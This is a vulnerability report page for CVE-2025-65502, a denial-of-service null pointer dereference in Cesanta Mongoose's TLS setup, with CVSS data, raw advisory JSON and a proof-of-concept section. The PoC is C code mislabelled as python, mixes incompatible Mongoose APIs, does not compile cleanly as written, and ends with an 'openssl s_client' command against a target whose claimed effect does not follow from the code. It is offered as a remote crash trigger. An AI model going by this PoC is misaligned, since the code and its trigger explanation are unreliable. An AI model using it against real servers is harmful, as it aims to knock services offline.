Security Vulnerability Report
中文
CVE-2025-65502 CVSS 4.3 MEDIUM

CVE-2025-65502

Published: 2025-11-24 14:15:48
Last Modified: 2025-12-12 13:32:49
Source: [email protected]

Description

Null pointer dereference in add_ca_certs() in Cesanta Mongoose before 7.2 allows remote attackers to cause a denial of service via TLS initialization where SSL_CTX_get_cert_store() returns NULL.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:cesanta:mongoose:*:*:*:*:*:*:*:* - VULNERABLE
Cesanta Mongoose < 7.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-65502 PoC - Null Pointer Dereference in add_ca_certs() // This PoC demonstrates triggering the NULL pointer dereference by causing // SSL_CTX_get_cert_store() to return NULL during TLS initialization #include <mongoose.h> #include <string.h> static void ev_handler(struct mg_connection *nc, int ev, void *ev_data) { switch (ev) { case MG_EV_ACCEPT: // Trigger TLS initialization with problematic cert store struct mg_tls_opts opts = { .ca = "invalid_path_to_ca_cert", // Invalid path causes initialization failure .cert = "server.crt", .key = "server.key" }; mg_tls_init(nc, &opts); break; case MG_EV_CLOSE: break; } } int main(void) { struct mg_mgr mgr; struct mg_connection *nc; mg_mgr_init(&mgr, NULL); // Listen on port 8443 with TLS enabled nc = mg_bind(&mgr, "8443", ev_handler); if (nc == NULL) { printf("Failed to bind to port\n"); return 1; } // Set TLS listening options nc->listener = 1; printf("Server started on port 8443\n"); // The vulnerability is triggered when: // 1. SSL_CTX_get_cert_store() returns NULL // 2. add_ca_certs() tries to use this NULL pointer // 3. This causes a null pointer dereference -> DoS while (1) { mg_mgr_poll(&mgr, 1000); } mg_mgr_free(&mgr); return 0; } // To trigger the vulnerability remotely: // openssl s_client -connect target:8443 -CAfile /nonexistent/path // This will cause SSL_CTX_get_cert_store() to return NULL during TLS handshake

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65502", "sourceIdentifier": "[email protected]", "published": "2025-11-24T14:15:48.100", "lastModified": "2025-12-12T13:32:49.247", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Null pointer dereference in add_ca_certs() in Cesanta Mongoose before 7.2 allows remote attackers to cause a denial of service via TLS initialization where SSL_CTX_get_cert_store() returns NULL."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cesanta:mongoose:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.2", "matchCriteriaId": "4B1A701D-3552-461A-8BFC-D0CF63242D2A"}]}]}], "references": [{"url": "https://github.com/cesanta/mongoose/issues/3306", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://github.com/cesanta/mongoose/pull/3307", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.